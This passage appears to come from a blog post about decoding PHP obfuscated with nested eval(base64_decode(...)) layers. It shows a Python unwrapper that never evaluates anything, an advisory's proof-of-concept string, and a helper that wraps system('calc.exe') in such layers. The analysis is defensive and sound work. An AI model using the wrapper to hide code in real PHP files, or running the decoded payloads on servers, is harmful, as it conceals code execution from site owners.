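        code = "eval(base64_decode('%s'));" % base64.b64encode(code.encode()).decode()
    return code


# The advisory's PoC string as printed, including the line-wrap space in the base64.
POC_FROM_ADVISORY = (
    "eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ2Rh"
    "V0doc1dYbG5ibEY2Y0dOV01HeFBVa1U1V0ZVeGVIcGxXRTR3V 2xjd2VrMXNlR3BaVjNocVRHMVdORnBU"
    "WTNCUGR6MDlKeWtwT3c9PScpKTs=')); ?>"
)

# Constructed sample, not from the advisory.
SAMPLE = wrap("system('calc.exe');", 2)

if __name__ == "__main__":
    print(unwrap_eval_layers(POC_FROM_ADVISORY))
    print(unwrap_eval_layers(SAMPLE))
```

The decoder never evaluates anything; it only reverses the encoding so the innermost statement can be read. Keep the depth limit: a decoder that loops until the wrapper no longer matches is itself a target for a payload built to nest thousands of layers.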

Source: Gmail -> IFTTT-> Blogger